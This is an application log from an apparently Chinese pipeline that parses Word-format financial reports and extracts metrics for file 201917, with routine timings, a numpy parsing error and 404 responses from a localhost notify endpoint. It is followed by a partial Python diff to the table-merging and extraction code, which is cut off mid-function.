2024-12-29 16:18:15,084|zzb_logger : INFO Run task 处理word文件中的table file_id:201917 (38828)...
|
||||
2024-12-29 16:18:15,156|zzb_logger : INFO Run task 处理word文件中的table file_id:201917 (39596)...
|
||||
2024-12-29 16:18:15,194|zzb_logger : INFO Run task 处理word文件中的table file_id:201917 (36908)...
|
||||
2024-12-29 16:18:15,268|zzb_logger : INFO Run task 处理word文件中的table file_id:201917 (38088)...
|
||||
2024-12-29 16:18:15,273|zzb_logger : INFO 解析表格时出现了异常 setting an array element with a sequence. The requested array has an inhomogeneous shape after 1 dimensions. The detected shape was (8,) + inhomogeneous part. 内容为{'type': 'table', 'index': 1438, 'data': [['项目', '期末', '期末', '期末', '期末', '期末', '期初', '期初', '期初', '期初', '期初', '期初', '期初', '期初'], ['', '账面余额', '账面价值', '受限类型', '受限情况', '受限情况', '账面余额', '账面余额', '账面价值', '账面价值', '受限类型', '受限类型', '受限情况', ''], ['货币资金', '485,532.72', '485,532.72', '', '住房专用基金', '住房专用基金', '482,151.75', '482,151.75', '482,151.75', '482,151.75', '', '', '住房专用基金', ''], ['固定资产', '9,798,299.46', '9,798,299.46', '', '金融机构借款抵押', '3,747,470.09', '3,747,470.09', '3,747,470.09', '3,747,470.09', '', '', '金融机构借款抵押', '金融机构借款抵押'], ['无形资产', '7,982,261.87', '7,982,261.87', '', '金融机构借款抵押', '5,437,462.92', '5,437,462.92', '5,437,462.92', '5,437,462.92', '', '', '金融机构借款抵押', '金融机构借款抵押'], ['货币资金', '43,997,452.57', '43,997,452.57', '', '银行保证金', '63,388,483.00', '63,388,483.00', '63,388,483.00', '63,388,483.00', '', '', '银行保证金', '银行保证金'], ['投资性房地产', '62,041,831.52', '62,041,831.52', '', '金融机构借款抵押', '67,653,392.10', '67,653,392.10', '67,653,392.10', '67,653,392.10', '', '', '金融机构借款抵押', '金融机构借款抵押'], ['合计', '124,305,378.14', '124,305,378.14', '', '', '140,708,959.86', '140,708,959.86', '140,708,959.86', '140,708,959.86', '', '', '', '']]}
|
||||
2024-12-29 16:18:15,722|zzb_logger : INFO Task 解析表格201917 runs 0.69 seconds.
|
||||
2024-12-29 16:18:15,873|zzb_logger : INFO Task 解析表格201917 runs 0.79 seconds.
|
||||
2024-12-29 16:18:16,067|zzb_logger : INFO Task 解析表格201917 runs 0.91 seconds.
|
||||
2024-12-29 16:18:16,086|zzb_logger : INFO Task 解析表格201917 runs 0.89 seconds.
|
||||
2024-12-29 16:18:16,158|zzb_logger : INFO Task 解析表格201917 runs 0.89 seconds.
|
||||
2024-12-29 16:18:16,787|zzb_logger : INFO Run task 处理word文件中的table file_id:201917 (39052)...
|
||||
2024-12-29 16:18:16,847|zzb_logger : INFO Run task 处理word文件中的table file_id:201917 (35928)...
|
||||
2024-12-29 16:18:17,456|zzb_logger : INFO Task 解析表格201917 runs 0.61 seconds.
|
||||
2024-12-29 16:18:17,644|zzb_logger : INFO Task 解析表格201917 runs 0.86 seconds.
|
||||
2024-12-29 16:18:17,819|zzb_logger : INFO word表格中 table解析完成,任务ID:201917
|
||||
2024-12-29 16:18:17,985|zzb_logger : INFO 解析任务 201917 完成,耗时62.29 秒。
|
||||
2024-12-29 16:18:18,106|zzb_logger : INFO 通知开始抽取指标url:201917:http://127.0.0.1:8100/api/tenant/report/notify?fileId=201917&status=6
|
||||
2024-12-29 16:18:18,106|zzb_logger : INFO 通知开始抽取指标状态:201917:<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|
||||
"http://www.w3.org/TR/html4/strict.dtd">
|
||||
<html>
|
||||
<head>
|
||||
<meta http-equiv="Content-Type" content="text/html;charset=utf-8">
|
||||
<title>Error response</title>
|
||||
</head>
|
||||
<body>
|
||||
<h1>Error response</h1>
|
||||
<p>Error code: 404</p>
|
||||
<p>Message: File not found.</p>
|
||||
<p>Error code explanation: HTTPStatus.NOT_FOUND - Nothing matches the given URI.</p>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
2024-12-29 16:18:18,107|zzb_logger : INFO 开始表格指标抽取,任务ID:201917
|
||||
2024-12-29 16:18:20,187|zzb_logger : INFO 提取指标任务 0-10 (29656)...
|
||||
2024-12-29 16:18:21,575|zzb_logger : INFO 提取指标任务 10-20 (38952)...
|
||||
2024-12-29 16:18:22,849|zzb_logger : INFO 提取指标任务 20-30 (31900)...
|
||||
2024-12-29 16:18:24,192|zzb_logger : INFO 提取指标任务 30-40 (30420)...
|
||||
2024-12-29 16:18:25,554|zzb_logger : INFO 提取指标任务 40-50 (32448)...
|
||||
2024-12-29 16:18:26,909|zzb_logger : INFO 提取指标任务 50-60 (37708)...
|
||||
2024-12-29 16:18:28,305|zzb_logger : INFO 提取指标任务 60-70 (36136)...
|
||||
2024-12-29 16:18:28,933|zzb_logger : INFO 被删除的字符: 大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况
|
||||
2024-12-29 16:18:28,933|zzb_logger : INFO 被删除的字符: 不适用不适用
|
||||
2024-12-29 16:18:28,933|zzb_logger : INFO 被删除的字符: 大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况
|
||||
2024-12-29 16:18:28,934|zzb_logger : INFO 被删除的字符: 不适用不适用
|
||||
2024-12-29 16:18:28,934|zzb_logger : INFO 被删除的字符: 大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况
|
||||
2024-12-29 16:18:28,934|zzb_logger : INFO 被删除的字符: 不适用不适用
|
||||
2024-12-29 16:18:28,934|zzb_logger : INFO 被删除的字符: 大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况
|
||||
2024-12-29 16:18:28,934|zzb_logger : INFO 被删除的字符: 不适用不适用
|
||||
2024-12-29 16:18:28,934|zzb_logger : INFO 被删除的字符: 大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况
|
||||
2024-12-29 16:18:28,934|zzb_logger : INFO 被删除的字符: 不适用不适用
|
||||
2024-12-29 16:18:28,935|zzb_logger : INFO 被删除的字符: 大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况
|
||||
2024-12-29 16:18:28,935|zzb_logger : INFO 被删除的字符: 不适用不适用
|
||||
2024-12-29 16:18:28,935|zzb_logger : INFO 被删除的字符: 大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况
|
||||
2024-12-29 16:18:28,935|zzb_logger : INFO 被删除的字符: 不适用不适用
|
||||
2024-12-29 16:18:28,935|zzb_logger : INFO 被删除的字符: 大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况
|
||||
2024-12-29 16:18:28,935|zzb_logger : INFO 被删除的字符: 不适用不适用
|
||||
2024-12-29 16:18:28,936|zzb_logger : INFO 被删除的字符: 大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况
|
||||
2024-12-29 16:18:28,941|zzb_logger : INFO 被删除的字符: 不适用不适用
|
||||
2024-12-29 16:18:28,941|zzb_logger : INFO 被删除的字符: 大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况
|
||||
2024-12-29 16:18:28,941|zzb_logger : INFO 被删除的字符: 不适用不适用
|
||||
2024-12-29 16:18:28,941|zzb_logger : INFO 被删除的字符: 大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况
|
||||
2024-12-29 16:18:28,941|zzb_logger : INFO 被删除的字符: 不适用不适用
|
||||
2024-12-29 16:18:28,942|zzb_logger : INFO 被删除的字符: 大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况
|
||||
2024-12-29 16:18:28,942|zzb_logger : INFO 被删除的字符: 不适用不适用
|
||||
2024-12-29 16:18:28,942|zzb_logger : INFO 被删除的字符: 大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况
|
||||
2024-12-29 16:18:28,942|zzb_logger : INFO 被删除的字符: 不适用不适用
|
||||
2024-12-29 16:18:28,942|zzb_logger : INFO 被删除的字符: 大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况
|
||||
2024-12-29 16:18:28,942|zzb_logger : INFO 被删除的字符: 不适用不适用
|
||||
2024-12-29 16:18:28,943|zzb_logger : INFO 被删除的字符: 大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况
|
||||
2024-12-29 16:18:28,943|zzb_logger : INFO 被删除的字符: 不适用不适用
|
||||
2024-12-29 16:18:28,943|zzb_logger : INFO 被删除的字符: 大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况
|
||||
2024-12-29 16:18:28,943|zzb_logger : INFO 被删除的字符: 不适用不适用
|
||||
2024-12-29 16:18:29,637|zzb_logger : INFO 提取指标任务 70-80 (39120)...
|
||||
2024-12-29 16:18:42,814|zzb_logger : INFO 被删除的字符: 000000
|
||||
2024-12-29 16:18:42,815|zzb_logger : INFO 被删除的字符: 000000
|
||||
2024-12-29 16:18:42,815|zzb_logger : INFO 被删除的字符: 000000
|
||||
2024-12-29 16:18:42,815|zzb_logger : INFO 被删除的字符: 000000
|
||||
2024-12-29 16:18:42,815|zzb_logger : INFO 被删除的字符: 000000
|
||||
2024-12-29 16:18:42,815|zzb_logger : INFO 被删除的字符: 000000
|
||||
2024-12-29 16:18:46,511|zzb_logger : INFO 提取指标 40-50 runs 20.96 seconds.
|
||||
2024-12-29 16:18:54,027|zzb_logger : INFO 提取指标 70-80 runs 24.39 seconds.
|
||||
2024-12-29 16:19:17,236|zzb_logger : INFO 提取指标 60-70 runs 48.93 seconds.
|
||||
2024-12-29 16:19:20,151|zzb_logger : INFO 提取指标 30-40 runs 55.96 seconds.
|
||||
2024-12-29 16:19:40,383|zzb_logger : INFO 提取指标 50-60 runs 73.47 seconds.
|
||||
2024-12-29 16:20:06,573|zzb_logger : INFO 提取指标 0-10 runs 106.39 seconds.
|
||||
2024-12-29 16:20:44,937|zzb_logger : INFO 提取指标 10-20 runs 143.36 seconds.
|
||||
2024-12-29 16:20:50,959|zzb_logger : INFO 提取指标 20-30 runs 148.11 seconds.
|
||||
2024-12-29 16:20:51,337|zzb_logger : INFO 表格指标抽取完成,任务ID:201917
|
||||
2024-12-29 16:20:51,337|zzb_logger : INFO 表格指标抽取 201917 完成,耗时153.23 秒。
|
||||
2024-12-29 16:20:51,337|zzb_logger : INFO 启动这个指标归一化任务ID-修改测试:201917
|
||||
2024-12-29 16:20:51,549|zzb_logger : INFO 目录黑名单为:[]
|
||||
2024-12-29 16:20:52,316|zzb_logger : INFO 向量配置数据查询 0.11 秒。
|
||||
2024-12-29 16:20:52,317|zzb_logger : INFO insert_table_measure_from_vector_async_process方法走的半年报
|
||||
2024-12-29 16:20:54,191|zzb_logger : INFO Run task 0-351 (41216)...
|
||||
2024-12-29 16:20:54,192|zzb_logger : INFO 插入数据 2815
|
||||
2024-12-29 16:20:54,742|zzb_logger : INFO 黑名单的值是[54, 144, 154, 708, 709, 537, 841, 460, 753, 762, 770, 1155, 787, 1805, 1841, 1633, 1760]和['49', '50', '53', '54', '143', '144', '147', '148', '154', '365', '158', '473', '274', '474', '87', '476', '277', '171', '278', '384', '489', '587', '280', '178', '180', '285', '187', '193', '506', '708', '709', '620', '621', '622', '629', '218', '219', '221', '823', '227', '536', '636', '537', '925', '542', '544', '926', '441', '551', '239', '839', '840', '841', '454', '842', '843', '568', '943', '944', '569', '460', '753', '945', '571', '946', '572', '574', '762', '954', '585', '955', '770', '1150', '960', '1274', '1154', '347', '1155', '787', '1289', '1163', '1166', '1401', '1171', '1176', '983', '885', '985', '1179', '986', '1312', '987', '805', '1315', '988', '1185', '989', '1558', '1316', '1321', '992', '1191', '1561', '993', '1322', '994', '1328', '995', '1109', '1195', '1432', '1688', '1333', '1000', '1198', '1805', '1337', '1438', '1341', '1809', '1206', '1344', '1696', '1697', '1814', '1347', '1701', '1125', '917', '1353', '1210', '1703', '919', '1708', '920', '1213', '1825', '924', '1711', '1214', '1606', '1369', '1457', '1714', '1218', '1460', '1835', '1720', '1614', '1841', '1723', '1223', '1618', '1844', '1623', '1847', '1386', '1849', '1735', '1851', '1389', '1633', '1477', '1857', '1736', '1234', '1393', '1480', '1738', '1636', '1240', '1398', '1486', '1743', '1643', '1746', '1870', '1250', '1751', '1873', '1254', '1882', '1257', '1760', '1887', '1762', '1266', '1763', '1894', '1775', '1913', '1782', '1793', '1543']以及新增的[]
|
||||
2024-12-29 16:20:55,664|zzb_logger : INFO Run task 351-702 (16388)...
|
||||
2024-12-29 16:20:55,664|zzb_logger : INFO 插入数据 2815
|
||||
2024-12-29 16:20:56,152|zzb_logger : INFO 黑名单的值是[54, 144, 154, 708, 709, 537, 841, 460, 753, 762, 770, 1155, 787, 1805, 1841, 1633, 1760]和['49', '50', '53', '54', '143', '144', '147', '148', '154', '365', '158', '473', '274', '474', '87', '476', '277', '171', '278', '384', '489', '587', '280', '178', '180', '285', '187', '193', '506', '708', '709', '620', '621', '622', '629', '218', '219', '221', '823', '227', '536', '636', '537', '925', '542', '544', '926', '441', '551', '239', '839', '840', '841', '454', '842', '843', '568', '943', '944', '569', '460', '753', '945', '571', '946', '572', '574', '762', '954', '585', '955', '770', '1150', '960', '1274', '1154', '347', '1155', '787', '1289', '1163', '1166', '1401', '1171', '1176', '983', '885', '985', '1179', '986', '1312', '987', '805', '1315', '988', '1185', '989', '1558', '1316', '1321', '992', '1191', '1561', '993', '1322', '994', '1328', '995', '1109', '1195', '1432', '1688', '1333', '1000', '1198', '1805', '1337', '1438', '1341', '1809', '1206', '1344', '1696', '1697', '1814', '1347', '1701', '1125', '917', '1353', '1210', '1703', '919', '1708', '920', '1213', '1825', '924', '1711', '1214', '1606', '1369', '1457', '1714', '1218', '1460', '1835', '1720', '1614', '1841', '1723', '1223', '1618', '1844', '1623', '1847', '1386', '1849', '1735', '1851', '1389', '1633', '1477', '1857', '1736', '1234', '1393', '1480', '1738', '1636', '1240', '1398', '1486', '1743', '1643', '1746', '1870', '1250', '1751', '1873', '1254', '1882', '1257', '1760', '1887', '1762', '1266', '1763', '1894', '1775', '1913', '1782', '1793', '1543']以及新增的[]
|
||||
2024-12-29 16:20:57,120|zzb_logger : INFO Run task 702-1053 (41796)...
|
||||
2024-12-29 16:20:57,120|zzb_logger : INFO 插入数据 2815
|
||||
2024-12-29 16:20:57,611|zzb_logger : INFO 黑名单的值是[54, 144, 154, 708, 709, 537, 841, 460, 753, 762, 770, 1155, 787, 1805, 1841, 1633, 1760]和['49', '50', '53', '54', '143', '144', '147', '148', '154', '365', '158', '473', '274', '474', '87', '476', '277', '171', '278', '384', '489', '587', '280', '178', '180', '285', '187', '193', '506', '708', '709', '620', '621', '622', '629', '218', '219', '221', '823', '227', '536', '636', '537', '925', '542', '544', '926', '441', '551', '239', '839', '840', '841', '454', '842', '843', '568', '943', '944', '569', '460', '753', '945', '571', '946', '572', '574', '762', '954', '585', '955', '770', '1150', '960', '1274', '1154', '347', '1155', '787', '1289', '1163', '1166', '1401', '1171', '1176', '983', '885', '985', '1179', '986', '1312', '987', '805', '1315', '988', '1185', '989', '1558', '1316', '1321', '992', '1191', '1561', '993', '1322', '994', '1328', '995', '1109', '1195', '1432', '1688', '1333', '1000', '1198', '1805', '1337', '1438', '1341', '1809', '1206', '1344', '1696', '1697', '1814', '1347', '1701', '1125', '917', '1353', '1210', '1703', '919', '1708', '920', '1213', '1825', '924', '1711', '1214', '1606', '1369', '1457', '1714', '1218', '1460', '1835', '1720', '1614', '1841', '1723', '1223', '1618', '1844', '1623', '1847', '1386', '1849', '1735', '1851', '1389', '1633', '1477', '1857', '1736', '1234', '1393', '1480', '1738', '1636', '1240', '1398', '1486', '1743', '1643', '1746', '1870', '1250', '1751', '1873', '1254', '1882', '1257', '1760', '1887', '1762', '1266', '1763', '1894', '1775', '1913', '1782', '1793', '1543']以及新增的[]
|
||||
2024-12-29 16:20:58,818|zzb_logger : INFO Run task 1053-1404 (39320)...
|
||||
2024-12-29 16:20:58,818|zzb_logger : INFO 插入数据 2815
|
||||
2024-12-29 16:20:59,324|zzb_logger : INFO 黑名单的值是[54, 144, 154, 708, 709, 537, 841, 460, 753, 762, 770, 1155, 787, 1805, 1841, 1633, 1760]和['49', '50', '53', '54', '143', '144', '147', '148', '154', '365', '158', '473', '274', '474', '87', '476', '277', '171', '278', '384', '489', '587', '280', '178', '180', '285', '187', '193', '506', '708', '709', '620', '621', '622', '629', '218', '219', '221', '823', '227', '536', '636', '537', '925', '542', '544', '926', '441', '551', '239', '839', '840', '841', '454', '842', '843', '568', '943', '944', '569', '460', '753', '945', '571', '946', '572', '574', '762', '954', '585', '955', '770', '1150', '960', '1274', '1154', '347', '1155', '787', '1289', '1163', '1166', '1401', '1171', '1176', '983', '885', '985', '1179', '986', '1312', '987', '805', '1315', '988', '1185', '989', '1558', '1316', '1321', '992', '1191', '1561', '993', '1322', '994', '1328', '995', '1109', '1195', '1432', '1688', '1333', '1000', '1198', '1805', '1337', '1438', '1341', '1809', '1206', '1344', '1696', '1697', '1814', '1347', '1701', '1125', '917', '1353', '1210', '1703', '919', '1708', '920', '1213', '1825', '924', '1711', '1214', '1606', '1369', '1457', '1714', '1218', '1460', '1835', '1720', '1614', '1841', '1723', '1223', '1618', '1844', '1623', '1847', '1386', '1849', '1735', '1851', '1389', '1633', '1477', '1857', '1736', '1234', '1393', '1480', '1738', '1636', '1240', '1398', '1486', '1743', '1643', '1746', '1870', '1250', '1751', '1873', '1254', '1882', '1257', '1760', '1887', '1762', '1266', '1763', '1894', '1775', '1913', '1782', '1793', '1543']以及新增的[]
|
||||
2024-12-29 16:21:00,159|zzb_logger : INFO Run task 1404-1755 (41868)...
|
||||
2024-12-29 16:21:00,159|zzb_logger : INFO 插入数据 2815
|
||||
2024-12-29 16:21:00,887|zzb_logger : INFO 黑名单的值是[54, 144, 154, 708, 709, 537, 841, 460, 753, 762, 770, 1155, 787, 1805, 1841, 1633, 1760]和['49', '50', '53', '54', '143', '144', '147', '148', '154', '365', '158', '473', '274', '474', '87', '476', '277', '171', '278', '384', '489', '587', '280', '178', '180', '285', '187', '193', '506', '708', '709', '620', '621', '622', '629', '218', '219', '221', '823', '227', '536', '636', '537', '925', '542', '544', '926', '441', '551', '239', '839', '840', '841', '454', '842', '843', '568', '943', '944', '569', '460', '753', '945', '571', '946', '572', '574', '762', '954', '585', '955', '770', '1150', '960', '1274', '1154', '347', '1155', '787', '1289', '1163', '1166', '1401', '1171', '1176', '983', '885', '985', '1179', '986', '1312', '987', '805', '1315', '988', '1185', '989', '1558', '1316', '1321', '992', '1191', '1561', '993', '1322', '994', '1328', '995', '1109', '1195', '1432', '1688', '1333', '1000', '1198', '1805', '1337', '1438', '1341', '1809', '1206', '1344', '1696', '1697', '1814', '1347', '1701', '1125', '917', '1353', '1210', '1703', '919', '1708', '920', '1213', '1825', '924', '1711', '1214', '1606', '1369', '1457', '1714', '1218', '1460', '1835', '1720', '1614', '1841', '1723', '1223', '1618', '1844', '1623', '1847', '1386', '1849', '1735', '1851', '1389', '1633', '1477', '1857', '1736', '1234', '1393', '1480', '1738', '1636', '1240', '1398', '1486', '1743', '1643', '1746', '1870', '1250', '1751', '1873', '1254', '1882', '1257', '1760', '1887', '1762', '1266', '1763', '1894', '1775', '1913', '1782', '1793', '1543']以及新增的[]
|
||||
2024-12-29 16:21:01,473|zzb_logger : INFO Run task 1755-2106 (26816)...
|
||||
2024-12-29 16:21:01,473|zzb_logger : INFO 插入数据 2815
|
||||
2024-12-29 16:21:02,171|zzb_logger : INFO 黑名单的值是[54, 144, 154, 708, 709, 537, 841, 460, 753, 762, 770, 1155, 787, 1805, 1841, 1633, 1760]和['49', '50', '53', '54', '143', '144', '147', '148', '154', '365', '158', '473', '274', '474', '87', '476', '277', '171', '278', '384', '489', '587', '280', '178', '180', '285', '187', '193', '506', '708', '709', '620', '621', '622', '629', '218', '219', '221', '823', '227', '536', '636', '537', '925', '542', '544', '926', '441', '551', '239', '839', '840', '841', '454', '842', '843', '568', '943', '944', '569', '460', '753', '945', '571', '946', '572', '574', '762', '954', '585', '955', '770', '1150', '960', '1274', '1154', '347', '1155', '787', '1289', '1163', '1166', '1401', '1171', '1176', '983', '885', '985', '1179', '986', '1312', '987', '805', '1315', '988', '1185', '989', '1558', '1316', '1321', '992', '1191', '1561', '993', '1322', '994', '1328', '995', '1109', '1195', '1432', '1688', '1333', '1000', '1198', '1805', '1337', '1438', '1341', '1809', '1206', '1344', '1696', '1697', '1814', '1347', '1701', '1125', '917', '1353', '1210', '1703', '919', '1708', '920', '1213', '1825', '924', '1711', '1214', '1606', '1369', '1457', '1714', '1218', '1460', '1835', '1720', '1614', '1841', '1723', '1223', '1618', '1844', '1623', '1847', '1386', '1849', '1735', '1851', '1389', '1633', '1477', '1857', '1736', '1234', '1393', '1480', '1738', '1636', '1240', '1398', '1486', '1743', '1643', '1746', '1870', '1250', '1751', '1873', '1254', '1882', '1257', '1760', '1887', '1762', '1266', '1763', '1894', '1775', '1913', '1782', '1793', '1543']以及新增的[]
|
||||
2024-12-29 16:21:02,832|zzb_logger : INFO Run task 2106-2457 (32120)...
|
||||
2024-12-29 16:21:02,832|zzb_logger : INFO 插入数据 2815
|
||||
2024-12-29 16:21:03,703|zzb_logger : INFO 黑名单的值是[54, 144, 154, 708, 709, 537, 841, 460, 753, 762, 770, 1155, 787, 1805, 1841, 1633, 1760]和['49', '50', '53', '54', '143', '144', '147', '148', '154', '365', '158', '473', '274', '474', '87', '476', '277', '171', '278', '384', '489', '587', '280', '178', '180', '285', '187', '193', '506', '708', '709', '620', '621', '622', '629', '218', '219', '221', '823', '227', '536', '636', '537', '925', '542', '544', '926', '441', '551', '239', '839', '840', '841', '454', '842', '843', '568', '943', '944', '569', '460', '753', '945', '571', '946', '572', '574', '762', '954', '585', '955', '770', '1150', '960', '1274', '1154', '347', '1155', '787', '1289', '1163', '1166', '1401', '1171', '1176', '983', '885', '985', '1179', '986', '1312', '987', '805', '1315', '988', '1185', '989', '1558', '1316', '1321', '992', '1191', '1561', '993', '1322', '994', '1328', '995', '1109', '1195', '1432', '1688', '1333', '1000', '1198', '1805', '1337', '1438', '1341', '1809', '1206', '1344', '1696', '1697', '1814', '1347', '1701', '1125', '917', '1353', '1210', '1703', '919', '1708', '920', '1213', '1825', '924', '1711', '1214', '1606', '1369', '1457', '1714', '1218', '1460', '1835', '1720', '1614', '1841', '1723', '1223', '1618', '1844', '1623', '1847', '1386', '1849', '1735', '1851', '1389', '1633', '1477', '1857', '1736', '1234', '1393', '1480', '1738', '1636', '1240', '1398', '1486', '1743', '1643', '1746', '1870', '1250', '1751', '1873', '1254', '1882', '1257', '1760', '1887', '1762', '1266', '1763', '1894', '1775', '1913', '1782', '1793', '1543']以及新增的[]
|
||||
2024-12-29 16:21:04,179|zzb_logger : INFO 等待所有子任务完成,任务ID:201917
|
||||
2024-12-29 16:21:04,179|zzb_logger : INFO Run task 2457-2815 (38332)...
|
||||
2024-12-29 16:21:04,179|zzb_logger : INFO 插入数据 2815
|
||||
2024-12-29 16:21:04,886|zzb_logger : INFO 黑名单的值是[54, 144, 154, 708, 709, 537, 841, 460, 753, 762, 770, 1155, 787, 1805, 1841, 1633, 1760]和['49', '50', '53', '54', '143', '144', '147', '148', '154', '365', '158', '473', '274', '474', '87', '476', '277', '171', '278', '384', '489', '587', '280', '178', '180', '285', '187', '193', '506', '708', '709', '620', '621', '622', '629', '218', '219', '221', '823', '227', '536', '636', '537', '925', '542', '544', '926', '441', '551', '239', '839', '840', '841', '454', '842', '843', '568', '943', '944', '569', '460', '753', '945', '571', '946', '572', '574', '762', '954', '585', '955', '770', '1150', '960', '1274', '1154', '347', '1155', '787', '1289', '1163', '1166', '1401', '1171', '1176', '983', '885', '985', '1179', '986', '1312', '987', '805', '1315', '988', '1185', '989', '1558', '1316', '1321', '992', '1191', '1561', '993', '1322', '994', '1328', '995', '1109', '1195', '1432', '1688', '1333', '1000', '1198', '1805', '1337', '1438', '1341', '1809', '1206', '1344', '1696', '1697', '1814', '1347', '1701', '1125', '917', '1353', '1210', '1703', '919', '1708', '920', '1213', '1825', '924', '1711', '1214', '1606', '1369', '1457', '1714', '1218', '1460', '1835', '1720', '1614', '1841', '1723', '1223', '1618', '1844', '1623', '1847', '1386', '1849', '1735', '1851', '1389', '1633', '1477', '1857', '1736', '1234', '1393', '1480', '1738', '1636', '1240', '1398', '1486', '1743', '1643', '1746', '1870', '1250', '1751', '1873', '1254', '1882', '1257', '1760', '1887', '1762', '1266', '1763', '1894', '1775', '1913', '1782', '1793', '1543']以及新增的[]
|
||||
2024-12-29 16:23:00,285|zzb_logger : INFO 所有子任务完成,任务ID:201917
|
||||
2024-12-29 16:23:00,286|zzb_logger : INFO 启动指标归一化任务ID:201917
|
||||
2024-12-29 16:23:00,286|zzb_logger : INFO 向量更新时间 127.97 秒。
|
||||
2024-12-29 16:23:00,474|zzb_logger : INFO 更新数据查询 0.17 秒。
|
||||
2024-12-29 16:23:00,474|zzb_logger : INFO update_ori_measure方法走的是半年报
|
||||
2024-12-29 16:23:00,474|zzb_logger : INFO 更新数据更新 0.00 秒。
|
||||
2024-12-29 16:23:00,522|zzb_logger : INFO 更新数据写入 0.05 秒。
|
||||
2024-12-29 16:23:00,522|zzb_logger : INFO 归一化完成任务ID:201917
|
||||
2024-12-29 16:23:00,522|zzb_logger : INFO 任务 201917 完成,耗时344.83 秒。
|
||||
2024-12-29 16:23:00,669|zzb_logger : INFO 通知任务状态url:201917:http://127.0.0.1:8100/api/tenant/report/notify?fileId=201917&status=1
|
||||
2024-12-29 16:23:00,669|zzb_logger : INFO 通知任务状态任务:201917:<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|
||||
"http://www.w3.org/TR/html4/strict.dtd">
|
||||
<html>
|
||||
<head>
|
||||
<meta http-equiv="Content-Type" content="text/html;charset=utf-8">
|
||||
<title>Error response</title>
|
||||
</head>
|
||||
<body>
|
||||
<h1>Error response</h1>
|
||||
<p>Error code: 404</p>
|
||||
<p>Message: File not found.</p>
|
||||
<p>Error code explanation: HTTPStatus.NOT_FOUND - Nothing matches the given URI.</p>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
2024-12-29 16:23:00,821|zzb_logger : INFO 任务 201917 完成
|
|
@ -427,19 +427,18 @@ def process_text_content(file_id,texts,tables,full_texts,type =0):
|
|||
"type" : "text",
|
||||
'content' : line_text,
|
||||
}},conn,cursor,"word_parse_process")
|
||||
|
||||
# 给慎用词校验用
|
||||
db_service_word.insert_word_parse_process({
|
||||
'file_id': file_id,
|
||||
'page_num': t["index"],
|
||||
'page_count': 100,
|
||||
'type': 'text',
|
||||
'content': {
|
||||
'page_num': t["index"],
|
||||
'table_index': t["index"],
|
||||
"type": "text",
|
||||
'content': line_text,
|
||||
}}, conn, cursor, "word_parse_data")
|
||||
# 给慎用词校验用
|
||||
db_service_word.insert_word_parse_process({
|
||||
'file_id': file_id,
|
||||
'page_num': t["index"],
|
||||
'page_count': 100,
|
||||
'type': 'text',
|
||||
'content': {
|
||||
'page_num': t["index"],
|
||||
'table_index': t["index"],
|
||||
"type": "text",
|
||||
'content': line_text,
|
||||
}}, conn, cursor, "word_parse_data")
|
||||
|
||||
table_name = "word_text_info"
|
||||
if type == 1:
|
||||
|
@ -519,12 +518,12 @@ def get_table_measure(file_id, word_tables, record_range):
|
|||
record_start = record_range.split('-')[0]
|
||||
record_end = record_range.split('-')[1]
|
||||
for index in range(int(record_start),int(record_end)):
|
||||
t = word_tables[index]
|
||||
t = word_tables[index][0]
|
||||
measure_obj =[]
|
||||
data_dict = {}
|
||||
measure_list = []
|
||||
try:
|
||||
arr = np.array(t['data'])
|
||||
arr = np.array(t["data"])
|
||||
rows, cols = arr.shape
|
||||
if rows == 1 and cols == 1:
|
||||
continue
|
||||
|
@ -679,7 +678,7 @@ def update_measure_data(file_id,file_path,parent_table_pages):
|
|||
# 创建一个cursor对象来执行SQL语句
|
||||
cursor_app = conn_app.cursor(buffered=True)
|
||||
applog.info(f'目录黑名单为:{parent_table_pages}')
|
||||
db_service_word.delete_to_run(conn,cursor,file_id)
|
||||
# db_service_word.delete_to_run(conn,cursor,file_id)
|
||||
db_service_word.insert_table_measure_from_vector_async_process(cursor,parent_table_pages,file_id,file_path)
|
||||
|
||||
# #指标归一化处理
|
||||
|
@ -692,15 +691,39 @@ def update_measure_data(file_id,file_path,parent_table_pages):
|
|||
|
||||
def merge_consecutive_arrays(word_info):
|
||||
merged_objects = []
|
||||
temp_list = []
|
||||
|
||||
for info_obj in word_info:
|
||||
try:
|
||||
if info_obj['type'] == 'table':
|
||||
# 如果对象是表格,将其元素添加到临时列表中
|
||||
merged_objects.append(info_obj)
|
||||
data = info_obj['data']
|
||||
if not data:
|
||||
continue
|
||||
first_row = data[0]
|
||||
if all(re.search(r'[\u4e00-\u9fa5]', cell) for cell in first_row[1:]) and len(temp_list) == 0:
|
||||
temp_list.append(info_obj)
|
||||
elif all(re.search(r'[\u4e00-\u9fa5]', cell) for cell in first_row[1:]) and len(temp_list) > 0:
|
||||
merged_objects.append(temp_list)
|
||||
temp_list = []
|
||||
temp_list.append(info_obj)
|
||||
elif not all(re.search(r'[\u4e00-\u9fa5]', cell) for cell in first_row[1:]) and len(temp_list) > 0:
|
||||
temp_data = temp_list[-1]['data']
|
||||
temp_data = list(temp_data)
|
||||
for row in list(info_obj['data']):
|
||||
temp_data.append(row)
|
||||
info_obj['data'] = temp_data
|
||||
